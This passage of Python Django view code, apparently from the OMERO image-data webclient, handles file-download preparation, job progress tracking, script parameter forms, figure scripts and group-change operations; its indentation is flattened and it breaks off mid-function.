zipName = "OriginalFileDownload"
targetIds = request.GET.get("ids") # E.g. image-1|image-2
defaultName = request.GET.get("name", zipName) # default zip name
defaultName = os.path.basename(defaultName) # remove path
if targetIds is None:
raise Http404("No IDs specified. E.g. ?ids=image-1|image-2")
ids = targetIds.split("|")
fileLists = []
fileCount = 0
filesTotalSize = 0
# If we're downloading originals, list original files so user can
# download individual files.
if format is None:
imgIds = []
wellIds = []
for i in ids:
if i.split("-")[0] == "image":
imgIds.append(i.split("-")[1])
elif i.split("-")[0] == "well":
wellIds.append(i.split("-")[1])
images = []
# Get images...
if imgIds:
images = list(conn.getObjects("Image", imgIds))
if len(images) == 0:
raise Http404("No images found.")
# Have a list of files per fileset (or per image without fileset)
fsIds = set()
fileIds = set()
for image in images:
fs = image.getFileset()
if fs is not None:
# Make sure we've not processed this fileset before.
if fs.id in fsIds:
continue
fsIds.add(fs.id)
files = list(image.getImportedImageFiles())
fList = []
for f in files:
if f.id in fileIds:
continue
fileIds.add(f.id)
fList.append({"id": f.id, "name": f.name, "size": f.getSize()})
filesTotalSize += f.getSize()
if len(fList) > 0:
fileLists.append(fList)
fileCount = sum([len(fList) for fList in fileLists])
else:
# E.g. JPEG/PNG - 1 file per image
fileCount = len(ids)
query = "&".join([_id.replace("-", "=") for _id in ids])
download_url = download_url + "?" + query
if format is not None:
download_url = download_url + "&format=%s" % format
context = {
"template": "webclient/annotations/download_placeholder.html",
"url": download_url,
"defaultName": defaultName,
"fileLists": fileLists,
"fileCount": fileCount,
"filesTotalSize": filesTotalSize,
}
if filesTotalSize > settings.MAXIMUM_MULTIFILE_DOWNLOAD_ZIP_SIZE:
context["downloadTooLarge"] = settings.MAXIMUM_MULTIFILE_DOWNLOAD_ZIP_SIZE
return context
@login_required(setGroupContext=True)
@render_response()
def load_calendar(request, year=None, month=None, conn=None, **kwargs):
"""
Loads the calendar which is displayed in the left panel of the history
page.
Shows current month by default. Filter by experimenter
"""
template = "webclient/history/calendar.html"
filter_user_id = request.session.get("user_id")
if year is not None and month is not None:
controller = BaseCalendar(conn=conn, year=year, month=month, eid=filter_user_id)
else:
today = datetime.datetime.today()
controller = BaseCalendar(
conn=conn, year=today.year, month=today.month, eid=filter_user_id
)
controller.create_calendar()
context = {"controller": controller}
context["template"] = template
return context
@login_required(setGroupContext=True)
@render_response()
def load_history(request, year, month, day, conn=None, **kwargs):
""" The data for a particular date that is loaded into the center panel """
if year is None or month is None or day is None:
raise Http404("Year, month, and day are required")
template = "webclient/history/history_details.html"
# get page
page = int(request.GET.get("page", 1))
filter_user_id = request.session.get("user_id")
controller = BaseCalendar(
conn=conn, year=year, month=month, day=day, eid=filter_user_id
)
controller.get_items(page)
context = {"controller": controller}
context["template"] = template
return context
def getObjectUrl(conn, obj):
"""
This provides a url to browse to the specified omero.model.ObjectI P/D/I,
S/P, FileAnnotation etc. used to display results from the scripting
service
E.g webclient/userdata/?path=image-12601
If the object is a file annotation, try to browse to the parent P/D/I
"""
base_url = reverse(viewname="load_template", args=["userdata"])
# if we have a File Annotation, then we want our URL to be for the parent
# object...
if isinstance(obj, omero.model.FileAnnotationI):
fa = conn.getObject("Annotation", obj.id.val)
for ptype in ["project", "dataset", "image"]:
links = list(fa.getParentLinks(ptype))
if len(links) > 0:
obj = links[0].parent
break
if obj.__class__.__name__ in (
"ImageI",
"DatasetI",
"ProjectI",
"ScreenI",
"PlateI",
"WellI",
):
otype = obj.__class__.__name__[:-1].lower()
base_url += "?show=%s-%s" % (otype, obj.id.val)
return base_url
######################
# Activities window & Progressbar
def update_callback(request, cbString, **kwargs):
"""Update a callback handle with key/value pairs"""
for key, value in kwargs.items():
request.session["callback"][cbString][key] = value
@login_required()
@render_response()
def activities(request, conn=None, **kwargs):
"""
This refreshes callback handles (delete, scripts, chgrp etc) and provides
html to update Activities window & Progressbar.
The returned html contains details for ALL callbacks in web session,
regardless of their status.
We also add counts of jobs, failures and 'in progress' to update status
bar.
"""
in_progress = 0
failure = 0
new_results = []
_purgeCallback(request)
# If we have a jobId (not added to request.session) just process it...
# ONLY used for chgrp/chown dry-run.
jobId = request.GET.get("jobId", None)
if jobId is not None:
jobId = str(jobId)
try:
prx = omero.cmd.HandlePrx.checkedCast(conn.c.ic.stringToProxy(jobId))
status = prx.getStatus()
logger.debug("job status: %s", status)
rsp = prx.getResponse()
if rsp is not None:
rv = graphResponseMarshal(conn, rsp)
rv["finished"] = True
else:
rv = {"finished": False}
rv["status"] = {
"currentStep": status.currentStep,
"steps": status.steps,
"startTime": status.startTime,
"stopTime": status.stopTime,
}
except IceException:
rv = {"finished": True}
return rv
elif request.method == "DELETE":
try:
json_data = json.loads(request.body)
except TypeError:
# for Python 3.5
json_data = json.loads(bytes_to_native_str(request.body))
jobId = json_data.get("jobId", None)
if jobId is not None:
jobId = str(jobId)
rv = {"jobId": jobId}
try:
prx = omero.cmd.HandlePrx.checkedCast(conn.c.ic.stringToProxy(jobId))
status = prx.getStatus()
logger.debug("pre-cancel() job status: %s", status)
rv["status"] = {
"currentStep": status.currentStep,
"steps": status.steps,
"startTime": status.startTime,
"stopTime": status.stopTime,
}
prx.cancel()
except omero.LockTimeout:
# expected that it will take > 5 seconds to cancel
logger.info("Timeout on prx.cancel()")
return rv
# test each callback for failure, errors, completion, results etc
for cbString in request.session.get("callback").keys():
callbackDict = request.session["callback"][cbString]
job_type = callbackDict["job_type"]
status = callbackDict["status"]
if status == "failed":
failure += 1
request.session.modified = True
# update chgrp / chown
if job_type in ("chgrp", "chown"):
if status not in ("failed", "finished"):
rsp = None
try:
prx = omero.cmd.HandlePrx.checkedCast(
conn.c.ic.stringToProxy(cbString)
)
rsp = prx.getResponse()
close_handle = False
try:
# if response is None, then we're still in progress,
# otherwise...
if rsp is not None:
close_handle = True
new_results.append(cbString)
if isinstance(rsp, omero.cmd.ERR):
rsp_params = ", ".join(
[
"%s: %s" % (k, v)
for k, v in rsp.parameters.items()
]
)
logger.error(
"%s failed with: %s" % (job_type, rsp_params)
)
update_callback(
request,
cbString,
status="failed",
report="%s %s" % (rsp.name, rsp_params),
error=1,
)
elif isinstance(rsp, omero.cmd.OK):
update_callback(request, cbString, status="finished")
else:
in_progress += 1
finally:
prx.close(close_handle)
except Exception:
logger.info(
"Activities %s handle not found: %s" % (job_type, cbString)
)
continue
elif job_type == "send_email":
if status not in ("failed", "finished"):
rsp = None
try:
prx = omero.cmd.HandlePrx.checkedCast(
conn.c.ic.stringToProxy(cbString)
)
callback = omero.callbacks.CmdCallbackI(
conn.c, prx, foreground_poll=True
)
rsp = callback.getResponse()
close_handle = False
try:
# if response is None, then we're still in progress,
# otherwise...
if rsp is not None:
close_handle = True
new_results.append(cbString)
if isinstance(rsp, omero.cmd.ERR):
rsp_params = ", ".join(
[
"%s: %s" % (k, v)
for k, v in rsp.parameters.items()
]
)
logger.error("send_email failed with: %s" % rsp_params)
update_callback(
request,
cbString,
status="failed",
report={"error": rsp_params},
error=1,
)
else:
total = (
rsp.success
+ len(rsp.invalidusers)
+ len(rsp.invalidemails)
)
update_callback(
request,
cbString,
status="finished",
rsp={"success": rsp.success, "total": total},
)
if (
len(rsp.invalidusers) > 0
or len(rsp.invalidemails) > 0
):
invalidusers = [
e.getFullName()
for e in list(
conn.getObjects(
"Experimenter", rsp.invalidusers
)
)
]
update_callback(
request,
cbString,
report={
"invalidusers": invalidusers,
"invalidemails": rsp.invalidemails,
},
)
else:
in_progress += 1
finally:
callback.close(close_handle)
except Exception:
logger.error(traceback.format_exc())
logger.info("Activities send_email handle not found: %s" % cbString)
# update delete
elif job_type == "delete":
if status not in ("failed", "finished"):
try:
handle = omero.cmd.HandlePrx.checkedCast(
conn.c.ic.stringToProxy(cbString)
)
cb = omero.callbacks.CmdCallbackI(
conn.c, handle, foreground_poll=True
)
rsp = cb.getResponse()
close_handle = False
try:
if not rsp: # Response not available
update_callback(
request,
cbString,
error=0,
status="in progress",
dreport=_formatReport(handle),
)
in_progress += 1
else: # Response available
close_handle = True
new_results.append(cbString)
rsp = cb.getResponse()
err = isinstance(rsp, omero.cmd.ERR)
if err:
update_callback(
request,
cbString,
error=1,
status="failed",
dreport=_formatReport(handle),
)
failure += 1
else:
update_callback(
request,
cbString,
error=0,
status="finished",
dreport=_formatReport(handle),
)
finally:
cb.close(close_handle)
except Ice.ObjectNotExistException:
update_callback(
request, cbString, error=0, status="finished", dreport=None
)
except Exception as x:
logger.error(traceback.format_exc())
logger.error("Status job '%s'error:" % cbString)
update_callback(
request, cbString, error=1, status="failed", dreport=str(x)
)
failure += 1
# update scripts
elif job_type == "script":
# if error on runScript, the cbString is not a ProcessCallback...
if not cbString.startswith("ProcessCallback"):
continue # ignore
if status not in ("failed", "finished"):
logger.info("Check callback on script: %s" % cbString)
try:
proc = omero.grid.ScriptProcessPrx.checkedCast(
conn.c.ic.stringToProxy(cbString)
)
except IceException:
update_callback(
request,
cbString,
status="failed",
Message="No process found for job",
error=1,
)
continue
cb = omero.scripts.ProcessCallbackI(conn.c, proc)
# check if we get something back from the handle...
if cb.block(0): # ms.
cb.close()
try:
# we can only retrieve this ONCE - must save results
results = proc.getResults(0, conn.SERVICE_OPTS)
update_callback(request, cbString, status="finished")
new_results.append(cbString)
except Exception:
update_callback(
request,
cbString,
status="finished",
Message="Failed to get results",
)
logger.info("Failed on proc.getResults() for OMERO.script")
continue
# value could be rstring, rlong, robject
rMap = {}
for key, value in results.items():
v = value.getValue()
if key in ("stdout", "stderr", "Message"):
if key in ("stderr", "stdout"):
# just save the id of original file
v = v.id.val
update_kwargs = {key: v}
update_callback(request, cbString, **update_kwargs)
else:
if hasattr(v, "id"):
# do we have an object (ImageI,
# FileAnnotationI etc)
obj_data = {
"id": v.id.val,
"type": v.__class__.__name__[:-1],
}
obj_data["browse_url"] = getObjectUrl(conn, v)
if v.isLoaded() and hasattr(v, "file"):
# try:
mimetypes = {
"image/png": "png",
"image/jpeg": "jpeg",
"text/plain": "text",
}
if v.file.mimetype.val in mimetypes:
obj_data["fileType"] = mimetypes[
v.file.mimetype.val
]
obj_data["fileId"] = v.file.id.val
obj_data["name"] = v.file.name.val
# except Exception:
# pass
if v.isLoaded() and hasattr(v, "name"):
# E.g Image, OriginalFile etc
name = unwrap(v.name)
if name is not None:
# E.g. FileAnnotation has null name
obj_data["name"] = name
rMap[key] = obj_data
else:
rMap[key] = unwrap(v)
update_callback(request, cbString, results=rMap)
else:
in_progress += 1
# having updated the request.session, we can now prepare the data for http
# response
rv = {}
for cbString in request.session.get("callback").keys():
# make a copy of the map in session, so that we can replace non
# json-compatible objects, without modifying session
rv[cbString] = copy.copy(request.session["callback"][cbString])
# return json (used for testing)
if "template" in kwargs and kwargs["template"] == "json":
for cbString in request.session.get("callback").keys():
rv[cbString]["start_time"] = str(
request.session["callback"][cbString]["start_time"]
)
rv["inprogress"] = in_progress
rv["failure"] = failure
rv["jobs"] = len(request.session["callback"])
return JsonResponse(rv) # json
jobs = []
new_errors = False
for key, data in rv.items():
# E.g. key: ProcessCallback/39f77932-c447-40d8-8f99-910b5a531a25 -t:tcp -h 10.211.55.2 -p 54727:tcp -h 10.37.129.2 -p 54727:tcp -h 10.12.2.21 -p 54727 # noqa
# create id we can use as html id,
# E.g. 39f77932-c447-40d8-8f99-910b5a531a25
if len(key.split(" ")) > 0:
htmlId = key.split(" ")[0]
if len(htmlId.split("/")) > 1:
htmlId = htmlId.split("/")[1]
rv[key]["id"] = htmlId
rv[key]["key"] = key
if key in new_results:
rv[key]["new"] = True
if "error" in data and data["error"] > 0:
new_errors = True
jobs.append(rv[key])
jobs.sort(key=lambda x: x["start_time"], reverse=True)
context = {
"sizeOfJobs": len(request.session["callback"]),
"jobs": jobs,
"inprogress": in_progress,
"new_results": len(new_results),
"new_errors": new_errors,
"failure": failure,
}
context["template"] = "webclient/activities/activitiesContent.html"
return context
@login_required()
def activities_update(request, action, **kwargs):
"""
If the above 'action' == 'clean' then we clear jobs from
request.session['callback'] either a single job (if 'jobKey' is specified
in POST) or all jobs (apart from those in progress)
"""
request.session.modified = True
if action == "clean":
if "jobKey" in request.POST:
jobId = request.POST.get("jobKey")
rv = {}
if jobId in request.session["callback"]:
del request.session["callback"][jobId]
request.session.modified = True
rv["removed"] = True
else:
rv["removed"] = False
return JsonResponse(rv)
else:
jobs = list(request.session["callback"].items())
for key, data in jobs:
if data["status"] != "in progress":
del request.session["callback"][key]
return HttpResponse("OK")
##############################################################################
# User Photo
@login_required()
def avatar(request, oid=None, conn=None, **kwargs):
""" Returns the experimenter's photo """
photo = conn.getExperimenterPhoto(oid)
return HttpResponse(photo, content_type="image/jpeg")
##############################################################################
# webgateway extention
@login_required()
def image_viewer(request, iid, share_id=None, **kwargs):
""" Delegates to webgateway, using share connection if appropriate """
kwargs["viewport_server"] = (
share_id is not None and reverse("webindex") + share_id or reverse("webindex")
)
# remove any trailing slash
kwargs["viewport_server"] = kwargs["viewport_server"].rstrip("/")
return webgateway_views.full_viewer(request, iid, **kwargs)
##############################################################################
# scripting service....
@login_required()
@render_response()
def list_scripts(request, conn=None, **kwargs):
"""
List the available scripts - Just officical scripts for now
If all scripts are under a single top-level directory, this is
removed by default. To prevent this, use ?full_path=true
"""
scriptService = conn.getScriptService()
scripts = scriptService.getScripts()
# group scripts into 'folders' (path), named by parent folder name
scriptMenu = {}
scripts_to_ignore = (
request.session.get("server_settings", {})
.get("scripts_to_ignore", "")
.split(",")
)
for s in scripts:
scriptId = s.id.val
path = s.path.val
name = s.name.val
fullpath = os.path.join(path, name)
if fullpath in scripts_to_ignore:
logger.info("Ignoring script %r" % fullpath)
continue
# We want to build a hierarchical <ul> <li> structure
# Each <ul> is a {}, each <li> is either a script 'name': <id> or
# directory 'name': {ul}
ul = scriptMenu
dirs = fullpath.split(os.path.sep)
for li, d in enumerate(dirs):
if len(d) == 0:
continue
if d not in ul:
# if last component in path:
if li + 1 == len(dirs):
ul[d] = scriptId
else:
ul[d] = {}
ul = ul[d]
# convert <ul> maps into lists and sort
def ul_to_list(ul):
dir_list = []
for name, value in ul.items():
if isinstance(value, dict):
# value is a directory
dir_list.append({"name": name, "ul": ul_to_list(value)})
else:
dir_list.append({"name": name, "id": value})
dir_list.sort(key=lambda x: x["name"].lower())
return dir_list
scriptList = ul_to_list(scriptMenu)
# If we have a single top-level directory, we can skip it
if not request.GET.get("full_path") and len(scriptList) == 1:
scriptList = scriptList[0]["ul"]
return scriptList
@login_required()
@render_response()
def script_ui(request, scriptId, conn=None, **kwargs):
"""
Generates an html form for the parameters of a defined script.
"""
scriptService = conn.getScriptService()
try:
params = scriptService.getParams(long(scriptId))
except Exception as ex:
if ex.message.lower().startswith("no processor available"):
return {
"template": "webclient/scripts/no_processor.html",
"scriptId": scriptId,
}
raise ex
if params is None:
return HttpResponse()
paramData = {}
paramData["id"] = long(scriptId)
paramData["name"] = params.name.replace("_", " ")
paramData["description"] = params.description
paramData["authors"] = ", ".join([a for a in params.authors])
paramData["contact"] = params.contact
paramData["version"] = params.version
paramData["institutions"] = ", ".join([i for i in params.institutions])
inputs = [] # use a list so we can sort by 'grouping'
Data_TypeParam = None
IDsParam = None
for key, param in params.inputs.items():
i = {}
i["name"] = key.replace("_", " ")
i["key"] = key
if not param.optional:
i["required"] = True
i["description"] = param.description
if param.min:
i["min"] = str(param.min.getValue())
if param.max:
i["max"] = str(param.max.getValue())
if param.values:
i["options"] = [v.getValue() for v in param.values.getValue()]
if param.useDefault:
i["default"] = unwrap(param.prototype)
if isinstance(i["default"], omero.model.IObject):
i["default"] = None
pt = unwrap(param.prototype)
if pt.__class__.__name__ == "dict":
i["map"] = True
elif pt.__class__.__name__ == "list":
i["list"] = True
if "default" in i:
i["default"] = ",".join([str(d) for d in i["default"]])
elif isinstance(pt, bool):
i["boolean"] = True
elif isinstance(pt, int) or isinstance(pt, long):
# will stop the user entering anything other than numbers.
i["number"] = "number"
elif isinstance(pt, float):
i["number"] = "float"
# if we got a value for this key in the page request, use this as
# default
if request.GET.get(key, None) is not None:
i["default"] = request.GET.get(key, None)
# E.g "" (string) or [0] (int list) or 0.0 (float)
i["prototype"] = unwrap(param.prototype)
i["grouping"] = param.grouping
inputs.append(i)
if key == "IDs":
IDsParam = i # remember these...
if key == "Data_Type":
Data_TypeParam = i
inputs.sort(key=lambda i: i["grouping"])
# if we have Data_Type param - use the request parameters to populate IDs
if (
Data_TypeParam is not None
and IDsParam is not None
and "options" in Data_TypeParam
):
IDsParam["default"] = ""
for dtype in Data_TypeParam["options"]:
if request.GET.get(dtype, None) is not None:
Data_TypeParam["default"] = dtype
IDsParam["default"] = request.GET.get(dtype, "")
break # only use the first match
# if we've not found a match, check whether we have "Well" selected
if len(IDsParam["default"]) == 0 and request.GET.get("Well", None) is not None:
if "Image" in Data_TypeParam["options"]:
wellIds = [long(j) for j in request.GET.get("Well", None).split(",")]
wellIdx = 0
try:
wellIdx = int(request.GET.get("Index", 0))
except Exception:
pass
wells = conn.getObjects("Well", wellIds)
imgIds = [str(w.getImage(wellIdx).getId()) for w in wells]
Data_TypeParam["default"] = "Image"
IDsParam["default"] = ",".join(imgIds)
# try to determine hierarchies in the groupings - ONLY handle 1 hierarchy
# level now (not recursive!)
for i in range(len(inputs)):
if len(inputs) <= i:
# we may remove items from inputs as we go - need to check
break
param = inputs[i]
grouping = param["grouping"] # E.g 03
param["children"] = list()
while len(inputs) > i + 1:
nextGrp = inputs[i + 1]["grouping"] # E.g. 03.1
if nextGrp.split(".")[0] == grouping:
param["children"].append(inputs[i + 1])
inputs.pop(i + 1)
else:
break
paramData["inputs"] = inputs
return {
"template": "webclient/scripts/script_ui.html",
"paramData": paramData,
"scriptId": scriptId,
}
@login_required()
@render_response()
def figure_script(request, scriptName, conn=None, **kwargs):
"""
Show a UI for running figure scripts
"""
imageIds = request.GET.get("Image", None) # comma - delimited list
datasetIds = request.GET.get("Dataset", None)
wellIds = request.GET.get("Well", None)
if wellIds is not None:
wellIds = [long(i) for i in wellIds.split(",")]
wells = conn.getObjects("Well", wellIds)
wellIdx = getIntOrDefault(request, "Index", 0)
imageIds = [str(w.getImage(wellIdx).getId()) for w in wells]
imageIds = ",".join(imageIds)
if imageIds is None and datasetIds is None:
return HttpResponse(
"Need to specify /?Image=1,2 or /?Dataset=1,2 or /?Well=1,2"
)
def validateIds(dtype, ids):
ints = [int(oid) for oid in ids.split(",")]
validObjs = {}
for obj in conn.getObjects(dtype, ints):
validObjs[obj.id] = obj
filteredIds = [iid for iid in ints if iid in validObjs.keys()]
if len(filteredIds) == 0:
raise Http404("No %ss found with IDs %s" % (dtype, ids))
else:
# Now we can specify group context - All should be same group
gid = list(validObjs.values())[0].getDetails().group.id.val
conn.SERVICE_OPTS.setOmeroGroup(gid)
return filteredIds, validObjs
context = {}
if imageIds is not None:
imageIds, validImages = validateIds("Image", imageIds)
context["idString"] = ",".join([str(i) for i in imageIds])
context["dtype"] = "Image"
if datasetIds is not None:
datasetIds, validDatasets = validateIds("Dataset", datasetIds)
context["idString"] = ",".join([str(i) for i in datasetIds])
context["dtype"] = "Dataset"
if scriptName == "SplitView":
scriptPath = "/omero/figure_scripts/Split_View_Figure.py"
template = "webclient/scripts/split_view_figure.html"
# Lookup Tags & Datasets (for row labels)
imgDict = [] # A list of data about each image.
for iId in imageIds:
data = {"id": iId}
img = validImages[iId]
data["name"] = img.getName()
tags = [
ann.getTextValue()
for ann in img.listAnnotations()
if ann._obj.__class__ == omero.model.TagAnnotationI
]
data["tags"] = tags
data["datasets"] = [d.getName() for d in img.listParents()]
imgDict.append(data)
# Use the first image as a reference
image = validImages[imageIds[0]]
context["imgDict"] = imgDict
context["image"] = image
context["channels"] = image.getChannels()
elif scriptName == "Thumbnail":
scriptPath = "/omero/figure_scripts/Thumbnail_Figure.py"
template = "webclient/scripts/thumbnail_figure.html"
def loadImageTags(imageIds):
tagLinks = conn.getAnnotationLinks("Image", parent_ids=imageIds)
linkMap = {} # group tags. {imageId: [tags]}
tagMap = {}
for iId in imageIds:
linkMap[iId] = []
for link in tagLinks:
c = link.getChild()
if c._obj.__class__ == omero.model.TagAnnotationI:
tagMap[c.id] = c
linkMap[link.getParent().id].append(c)
imageTags = []
for iId in imageIds:
imageTags.append({"id": iId, "tags": linkMap[iId]})
tags = []
for tId, t in tagMap.items():
tags.append(t)
return imageTags, tags
thumbSets = [] # multiple collections of images
tags = []
figureName = "Thumbnail_Figure"
if datasetIds is not None:
for d in conn.getObjects("Dataset", datasetIds):
imgIds = [i.id for i in d.listChildren()]
imageTags, ts = loadImageTags(imgIds)
thumbSets.append({"name": d.getName(), "imageTags": imageTags})
tags.extend(ts)
figureName = thumbSets[0]["name"]
else:
imageTags, ts = loadImageTags(imageIds)
thumbSets.append({"name": "images", "imageTags": imageTags})
tags.extend(ts)
parent = conn.getObject("Image", imageIds[0]).getParent()
figureName = parent.getName() or "Thumbnail Figure"
context["parent_id"] = parent.getId()
uniqueTagIds = set() # remove duplicates
uniqueTags = []
for t in tags:
if t.id not in uniqueTagIds:
uniqueTags.append(t)
uniqueTagIds.add(t.id)
uniqueTags.sort(key=lambda x: x.getTextValue().lower())
context["thumbSets"] = thumbSets
context["tags"] = uniqueTags
context["figureName"] = figureName.replace(" ", "_")
elif scriptName == "MakeMovie":
scriptPath = "/omero/export_scripts/Make_Movie.py"
template = "webclient/scripts/make_movie.html"
# expect to run on a single image at a time
image = conn.getObject("Image", imageIds[0])
# remove extension (if 3 chars or less)
movieName = image.getName().rsplit(".", 1)
if len(movieName) > 1 and len(movieName[1]) > 3:
movieName = ".".join(movieName)
else:
movieName = movieName[0]
# make sure name is not a path
context["movieName"] = os.path.basename(movieName)
chs = []
for c in image.getChannels():
chs.append(
{
"active": c.isActive(),
"color": c.getColor().getHtml(),
"label": c.getLabel(),
}
)
context["channels"] = chs
context["sizeT"] = image.getSizeT()
context["sizeZ"] = image.getSizeZ()
scriptService = conn.getScriptService()
scriptId = scriptService.getScriptID(scriptPath)
if scriptId < 0:
raise AttributeError("No script found for path '%s'" % scriptPath)
context["template"] = template
context["scriptId"] = scriptId
return context
@login_required()
@render_response()
def fileset_check(request, action, conn=None, **kwargs):
"""
Check whether Images / Datasets etc contain partial Multi-image filesets.
Used by chgrp or delete dialogs to test whether we can perform this
'action'.
"""
dtypeIds = {}
for dtype in ("Image", "Dataset", "Project"):
ids = request.GET.get(dtype, None)
if ids is not None:
dtypeIds[dtype] = [int(i) for i in ids.split(",")]
splitFilesets = conn.getContainerService().getImagesBySplitFilesets(
dtypeIds, None, conn.SERVICE_OPTS
)
splits = []
for fsId, splitIds in splitFilesets.items():
splits.append(
{
"id": fsId,
"attempted_iids": splitIds[True],
"blocking_iids": splitIds[False],
}
)
context = {"split_filesets": splits}
context["action"] = action
if action == "chgrp":
context["action"] = "move"
context["template"] = "webclient/activities/" "fileset_check_dialog_content.html"
return context
def getAllObjects(
conn, project_ids, dataset_ids, image_ids, screen_ids, plate_ids, experimenter_id
):
"""
Given a list of containers and images, calculate all the descendants
and necessary siblings (for any filesets)
"""
# TODO Handle None inputs, maybe add defaults
params = omero.sys.ParametersI()
qs = conn.getQueryService()
project_ids = set(project_ids)
dataset_ids = set(dataset_ids)
image_ids = set(image_ids)
fileset_ids = set([])
plate_ids = set(plate_ids)
screen_ids = set(screen_ids)
# Get any datasets for projects
if project_ids:
params.map = {}
params.map["pids"] = rlist([rlong(x) for x in list(project_ids)])
q = """
select pdlink.child.id
from ProjectDatasetLink pdlink
where pdlink.parent.id in (:pids)
"""
for e in qs.projection(q, params, conn.SERVICE_OPTS):
dataset_ids.add(e[0].val)
# Get any plates for screens
if screen_ids:
params.map = {}
params.map["sids"] = rlist([rlong(x) for x in screen_ids])
q = """
select splink.child.id
from ScreenPlateLink splink
where splink.parent.id in (:sids)
"""
for e in qs.projection(q, params, conn.SERVICE_OPTS):
plate_ids.add(e[0].val)
# Get any images for datasets
if dataset_ids:
params.map = {}
params.map["dids"] = rlist([rlong(x) for x in dataset_ids])
q = """
select dilink.child.id,
dilink.child.fileset.id
from DatasetImageLink dilink
where dilink.parent.id in (:dids)
"""
for e in qs.projection(q, params, conn.SERVICE_OPTS):
image_ids.add(e[0].val)
# Some images in Dataset may not have fileset
if e[1] is not None:
fileset_ids.add(e[1].val)
# Get any images for plates
# TODO Seemed no need to add the filesets for plates as it isn't possible
# to link it from outside of its plate. This may be true for the client,
# but it certainly isn't true for the model so maybe allow this to also get
# filesets
if plate_ids:
params.map = {}
params.map["plids"] = rlist([rlong(x) for x in plate_ids])
q = """
select ws.image.id
from WellSample ws
join ws.plateAcquisition pa
where pa.plate.id in (:plids)
"""
for e in qs.projection(q, params, conn.SERVICE_OPTS):
image_ids.add(e[0].val)
# Get any extra images due to filesets
if fileset_ids:
params.map = {}
params.map["fsids"] = rlist([rlong(x) for x in fileset_ids])
q = """
select image.id
from Image image
left outer join image.datasetLinks dilink
where image.fileset.id in (select fs.id
from Image im
join im.fileset fs
where fs.id in (:fsids)
group by fs.id
having count(im.id)>1)
"""
for e in qs.projection(q, params, conn.SERVICE_OPTS):
image_ids.add(e[0].val)
# Get any additional datasets that may need updating as their children have
# been snatched.
# TODO Need to differentiate which orphaned directories need refreshing
extra_dataset_ids = set([])
extra_orphaned = False
if image_ids:
params.map = {
"iids": rlist([rlong(x) for x in image_ids]),
}
exclude_datasets = ""
if dataset_ids:
params.map["dids"] = rlist([rlong(x) for x in dataset_ids])
# Make sure to allow parentless results as well as those
# that do not match a dataset being removed
exclude_datasets = """
and (
dilink.parent.id not in (:dids)
or dilink.parent.id = null
)
"""
q = (
"""
select distinct dilink.parent.id
from Image image
left outer join image.datasetLinks dilink
where image.id in (:iids)
%s
and (select count(dilink2.child.id)
from DatasetImageLink dilink2
where dilink2.parent.id = dilink.parent.id
and dilink2.child.id not in (:iids)) = 0
"""
% exclude_datasets
)
for e in qs.projection(q, params, conn.SERVICE_OPTS):
if e:
extra_dataset_ids.add(e[0].val)
else:
extra_orphaned = True
# Get any additional projects that may need updating as their children have
# been snatched. There is no need to check for orphans because if a dataset
# is being removed from somewhere else, it can not exist as an orphan.
extra_project_ids = set([])
if dataset_ids:
params.map = {"dids": rlist([rlong(x) for x in dataset_ids])}
exclude_projects = ""
if project_ids:
params.map["pids"] = rlist([rlong(x) for x in project_ids])
exclude_projects = "and pdlink.parent.id not in (:pids)"
q = (
"""
select distinct pdlink.parent.id
from ProjectDatasetLink pdlink
where pdlink.child.id in (:dids)
%s
and (select count(pdlink2.child.id)
from ProjectDatasetLink pdlink2
where pdlink2.parent.id = pdlink.parent.id
and pdlink2.child.id not in (:dids)) = 0
"""
% exclude_projects
)
for e in qs.projection(q, params, conn.SERVICE_OPTS):
extra_project_ids.add(e[0].val)
# We now have the complete list of objects that will change group
# We also have an additional list of datasets/projects that may have had
# snatched children and thus may need updating in the client if the
# dataset/project has gone from N to 0 children
result = {
# These objects are completely removed
"remove": {
"project": list(project_ids),
"dataset": list(dataset_ids),
"screen": list(screen_ids),
"plate": list(plate_ids),
"image": list(image_ids),
},
# These objects now have no children
"childless": {
"project": list(extra_project_ids),
"dataset": list(extra_dataset_ids),
"orphaned": extra_orphaned,
},
}
return result
@require_POST
@login_required()
def chgrpDryRun(request, conn=None, **kwargs):
return dryRun(request, action="chgrp", conn=conn, **kwargs)
@require_POST
@login_required()
def dryRun(request, action, conn=None, **kwargs):
"""Submit chgrp or chown dry-run"""
targetObjects = {}
dtypes = ["Project", "Dataset", "Image", "Screen", "Plate", "Fileset"]
for dtype in dtypes:
oids = request.POST.get(dtype, None)
if oids is not None:
obj_ids = [int(oid) for oid in oids.split(",")]
targetObjects[dtype] = obj_ids
if action == "chgrp":
target_id = getIntOrDefault(request, "group_id", None)
elif action == "chown":
target_id = getIntOrDefault(request, "owner_id", None)
handle = conn.submitDryRun(action, targetObjects, target_id)
jobId = str(handle)
return HttpResponse(jobId)
@login_required()
def chgrp(request, conn=None, **kwargs):
"""
Moves data to a new group, using the chgrp queue.
Handles submission of chgrp form: all data in POST.
Adds the callback handle to the request.session['callback']['jobId']
"""
if not request.method == "POST":
return JsonResponse({"Error": "Need to POST to chgrp"}, status=405)
# Get the target group_id
group_id = getIntOrDefault(request, "group_id", None)
if group_id is None:
return JsonResponse({"Error": "chgrp: No group_id specified"})
group_id = long(group_id)
def getObjectOwnerId(r):
for t in ["Dataset", "Image", "Plate"]:
ids = r.POST.get(t, None)
if ids is not None:
for o in list(conn.getObjects(t, ids.split(","))):
return o.getDetails().owner.id.val
group = conn.getObject("ExperimenterGroup", group_id)
new_container_name = request.POST.get("new_container_name", None)
new_container_type = request.POST.get("new_container_type", None)
container_id = None
# Context must be set to owner of data, E.g. to create links.
ownerId = getObjectOwnerId(request)
conn.SERVICE_OPTS.setOmeroUser(ownerId)
if (
new_container_name is not None
and len(new_container_name) > 0
and new_container_type is not None
):
conn.SERVICE_OPTS.setOmeroGroup(group_id)
container_id = conn.createContainer(new_container_type, new_container_name)
# No new container, check if target is specified
if container_id is None:
# E.g. "dataset-234"
target_id = request.POST.get("target_id", None)
container_id = target_id is not None and target_id.split("-")[1] or None
dtypes = ["Project", "Dataset", "Image", "Screen", "Plate"]
for dtype in dtypes:
# Get all requested objects of this type
oids = request.POST.get(dtype, None)
if oids is not None:
obj_ids = [int(oid) for oid in oids.split(",")]
# TODO Doesn't the filesets only apply to images?
# if 'filesets' are specified, make sure we move ALL Fileset Images
fsIds = request.POST.getlist("fileset")
if len(fsIds) > 0:
# If a dataset is being moved and there is a split fileset
# then those images need to go somewhere in the new
if dtype == "Dataset":
conn.regroupFilesets(dsIds=obj_ids, fsIds=fsIds)
else:
for fs in conn.getObjects("Fileset", fsIds):
